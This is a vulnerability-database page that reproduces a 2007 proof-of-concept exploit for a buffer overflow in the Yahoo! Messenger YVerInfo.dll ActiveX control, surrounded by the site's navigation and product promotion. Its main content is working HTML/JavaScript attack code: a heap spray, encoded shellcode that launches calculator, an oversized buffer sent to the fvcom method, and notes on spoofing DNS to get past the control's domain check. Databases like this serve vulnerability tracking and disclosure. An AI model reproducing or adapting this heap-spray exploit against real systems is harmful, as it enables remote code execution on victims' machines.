Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 14 Views

Yahoo! Messenger YVerInfo.dll ActiveX Buffer Overflow Exploi

Code

                                                &#60;!--
Yahoo! Messenger (YVerInfo.dll &#60;= 2007.8.27.1) ActiveX Control Buffer Overflows

update YM : http://messenger.yahoo.com/security_update.php?id=082907

Functions : fvcom or info;
RegKey Safe for Script: True 
RegKey Safe for Init: True
-&#62; that functions are safely scriptable and exploitable by HeapSpray Technique

Tested : Windows XP Professional SP2 all patched,Internet Explorer 7

That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -&#62; I used &#34;Simple DNS Plus&#34; for manipulating the DNS resolution.

I saved this file (exploit.htm) into directory root (web server) 
and I exploited with link : http://www.yahoo.com/exploit.htm

coder : minhbq
 mail : [email protected]
--&#62;


&#60;html&#62;
&#60;!-- CLSID of YverInfo.dll --&#62;
&#60;object classid=&#34;CLSID:D5184A39-CBDF-4A4F-AC1A-7A45A852C883&#34; id=&#34;target&#34;&#62;&#60;/OBJECT&#62;

&#60;SCRIPT language=&#34;javascript&#34;&#62;
// HeapSpray - execute calculator	
	shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);    
	bigblock = unescape(&#34;%u9090%u9090&#34;);    
    headersize = 20;    
    slackspace = headersize+shellcode.length
    while (bigblock.length&#60;slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace&#60;0x40000) block = block+block+fillblock;    
	memory = new Array();
    for (i=0;i&#60;800;i++) memory[i] = block + shellcode;

	var buffer =  unescape(&#34;%0D&#34;);
	while (buffer.length&#60; 10000) buffer+=unescape(&#34;%0D&#34;);

// Vulnerability of method fvcom
	target.fvcom(buffer);			

&#60;/script&#62;
&#60;/html&#62;

# milw0rm.com [2007-09-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
yahoo messengeryverinfo.dllactivex controlbuffer overflowsecurity updateheapspray techniquewindows xpinternet explorer 7dns resolutionexploitcalculatorvulnerabilityfvcom methodmilw0rm.
14